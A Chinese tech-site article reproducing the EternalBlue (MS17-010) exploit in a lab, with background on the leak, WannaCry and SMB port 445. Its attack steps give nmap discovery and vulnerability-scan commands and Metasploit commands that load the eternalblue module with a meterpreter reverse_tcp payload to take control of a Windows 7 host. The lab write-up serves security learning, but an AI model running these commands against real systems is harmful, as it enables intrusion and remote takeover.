| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> 永恒之蓝漏洞复现(MS17010) -> 正文阅读 |
|
[系统运维]永恒之蓝漏洞复现(MS17010) |
永恒之蓝实验(MS17010)1.概念永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 2.什么是ARTAPT(Advanced Persistent Threat):高级持续威胁,主要特点是利用手段高,攻击持续,高危害。 APT攻击的一般规律: 1)高度目的性 2)高度隐蔽性 3)高度危害性 4)目标实体化 5)极强的持续性 。一个APT是有一套隐匿和持续攻击的框架的,往往针对特定的实体由一人或多人策划(一般是多人)。 3.445端口作用SMB(server message blick) 是windows协议族,用于文件和打印共享服务。 NBT(netbios over TCP/IP)使用137.138(UDP)和139(TCP来实现基于TCP/IP的netbiso网络互联) 在windows中,SMB服务除了基于NBT的实现,还有直接通过445端口实现。当windows(允许NBT)作为客户端来连接SMB服务器时,它会同时尝试连接139和445端口,如果445端口有响应,那么就发送RST包给139端口看看开连接,以445端口通信来继续,当445端口无响应时,才使用139端口。 4.实验过程环境kali攻击主机一台、window 7 工具:kali自带的Nmap及MSF攻击框架(metasploit) namp重要常?参数含义
步骤(1)主机发现—利用nmap扫描发现攻击 nmap -n -sS 192.168.6.0/24 ? 进一步端口发现—指定端口扫描 nmap -n -p445 192.168.6.0/24 --open ? 漏洞发现—探测是否存在已知漏洞 nmap -O -sV 192.168.6.134 -script=vuln(win7ip) (2)开启metaspolit: msfconsole +++选择攻击模块====>use exploit/windows/smb/ms17_010_eternalblue +++选择有效payload====>set payload windows/meterpreter/reverse_tcp (32位) +++选择有效payload====> set payload windows/x64/meterpreter/reverse_tcp (64位) +++设置本地攻击主机=====>set LHOST 192.168.6.128 +++设置远程目标主机=====>set RHOST 192.168.6.134 +++设置本地侦听接口====>set LPORT 5555 +++开始攻击====>run +++攻击成功,获得回连!! (3)全面控制
(4)监控屏幕
|
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/25 16:34:42- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |